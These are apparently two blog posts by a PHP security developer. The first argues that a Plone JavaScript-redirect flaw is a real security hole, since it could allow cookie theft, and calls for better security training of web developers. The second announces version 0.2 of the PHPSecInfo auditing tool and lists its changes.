Well, yes, actually, it is a security hole.  If one can place JavaScript on your site that redirects the user to another page, they can certainly place JavaScript on your site that grabs a user’s cookie data and redirects that to another site.  Whether or not they’ll get something useful from the data varies from app to app, of course. What’s worrisome is that it appears as if one of Plone’s founders (the byline on this document is for Alexander Limi, whose user page describes him as “one of Plone’s original founders.”) doesn’t seem to think this is a security issue. After getting feedback from Alexander Limi, it seems clear that he does understand the user-level security implications of the vulnerability, but was trying to make the distinction that there was no security risk to the Plone site itself.  Still, the language of the document is (unintentionally) misleading, and it’s very reminiscent of the kinds of misunderstandings and excuses I see all the time in open-source web app development.

The point here is (believe it or not) not to pick on Plone.  This is a problem prevalent in most open source development (and in closed source dev, from my experience).  People who simply shouldn’t be doing coding are doing the coding—and the implementation and maintenance.

Let’s be blunt: A web developer is not qualified to do the job if he or she does not have a good understanding of web application security concepts and techniques.  Leaders of development teams must stop allowing developers who are weak on security techniques to contribute to their products, and managers need to stop hiring candidates who do not demonstrate a solid secure programming background.  If they continue to do so, they demonstrate a lack of concern for the safety of their customers.

Educational initiatives must be stepped up to address this, both on the traditional academic level and in continuing education/training programs.  Students in web development curriculums at the undergrad level need to be taught the importance of security and effective secure programming techniques.  Developers in the workforce today need to have access to materials and programs that will do the same.  And the managerial level needs to be brought up to speed on what to look for in the developers they hire, so that under-qualifed and unqualified developers are no longer the norm on most web dev teams.

 

PHPSecInfo v0.2 now available

PHPSecInfo Screenshot PHPSecInfo Screenshot

The newest version of PHPSecInfo, version 0.2, is now available.  Here are the major changes:

  • Added link to “more info” in output.  These lead to pages on the phpsec.org site giving more details on the test and what to do if you have a problem
  • Modified CSS to improve readability and avoid license issue with PHP (the old CSS was derived from the output of phpinfo())
  • New test: PhpSecInfo_Test_Session_Save_Path
  • Added display of “current” and “recommended” settings in test result output
  • Various minor changes and bug fixes; see the CHANGELOG for details

-Download now

-Join the mailing list